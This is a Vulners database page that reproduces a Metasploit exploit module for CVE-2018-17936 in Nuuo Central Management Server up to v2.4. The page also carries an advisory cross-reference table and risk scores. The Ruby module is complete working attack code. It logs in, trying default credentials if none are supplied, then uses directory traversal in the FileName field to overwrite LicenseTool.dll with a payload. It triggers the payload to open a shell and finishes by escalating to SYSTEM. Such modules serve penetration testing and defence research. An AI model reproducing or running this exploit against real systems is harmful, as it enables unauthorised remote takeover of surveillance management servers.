Vulners
Lucene search
Nuuo Central Management Server 2.4 Authenticated Arbitrary File Upload Exploit
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Nuuo Central Management Server Authenticated Arbitrary File Upload | 27 Nov 201800:00 | – | attackerkb |
 | CVE-2018-17936 | 20 Feb 201913:59 | – | circl |
 | NUUO CMS Code Execution Vulnerability (CNVD-2018-24251) | 29 Nov 201800:00 | – | cnvd |
 | CVE-2018-17936 | 27 Nov 201821:00 | – | cve |
 | CVE-2018-17936 | 27 Nov 201821:00 | – | cvelist |
 | NUUO CMS (Update A) | 11 Oct 201800:00 | – | ics |
 | Nuuo Central Management Server Authenticated Arbitrary File Upload | 21 Jan 201910:06 | – | metasploit |
 | CVE-2018-17936 | 27 Nov 201820:29 | – | nvd |
 | Nuuo Central Management Server 2.4 Authenticated Arbitrary File Upload | 20 Feb 201900:00 | – | packetstorm |
 | Remote code execution | 27 Nov 201820:29 | – | prion |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::Nuuo
def initialize(info={})
super(update_info(info,
'Name' => "Nuuo Central Management Server Authenticated Arbitrary File Upload",
'Description' => %q{
The COMMITCONFIG verb is used by a CMS client to upload and modify the configuration of the
CMS Server.
The vulnerability is in the "FileName" parameter, which accepts directory traversal (..\\..\\)
characters. Therefore, this function can be abused to overwrite any files in the installation
drive of CMS Server.
This vulnerability is exploitable in CMS versions up to and including v2.4.
This module will either use a provided session number (which can be guessed with an auxiliary
module) or attempt to login using a provided username and password - it will also try the
default credentials if nothing is provided.
This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
not execute successfully.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module
],
'References' =>
[
[ 'CVE', '2018-17936' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2019/Jan/51' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt' ]
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Nuuo Central Management Server <= v2.4.0', {} ],
],
'Privileged' => true,
'DisclosureDate' => 'Oct 11 2018',
'DefaultTarget' => 0))
end
def on_new_session(client)
if client.type == 'meterpreter'
print_warning('Please wait a bit while we clean up')
client.sys.process.get_processes().each do |proc|
if proc['name'] == 'NCS_Server.exe'
client.sys.process.kill(proc['pid'])
Rex.sleep(5)
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
client.sys.process.execute('NCS_Server.exe')
print_good('Successfully restored LicenseTool.dll!')
end
end
# elevate privs to system (we're already Admin anyway), and we're done!
client.run_cmd('getsystem')
print_good('We should have SYSTEM now, enjoy your shell!')
else
print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')
print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
print_error('... otherwise the Nuuo CMS installation will be nuked!')
print_good('Anyway, enjoy your shell!')
end
end
def exploit
nucs_login
unless @nucs_session
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
end
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
# and not nuke the CMS installation.
@dll = rand_text_alpha(12)
print_status("Backing up LicenseTool.dll to #{@dll}")
dll_data = nucs_download_file('LicenseTool.dll')
nucs_upload_file(@dll, dll_data)
print_status('Uploading payload...')
nucs_upload_file('LicenseTool.dll', generate_payload_dll)
print_status('Sleeping 15 seconds...')
Rex.sleep(15)
print_status('Sending SENDLICFILE request, shell incoming!')
license_data = rand_text_alpha(50..350)
nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic",
'Content-Length: ' + license_data.length.to_s], license_data)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Feb 2019 00:00Current
0.2Low risk
Vulners AI Score0.2
CVSS 27.5
CVSS 39.8
EPSS0.67158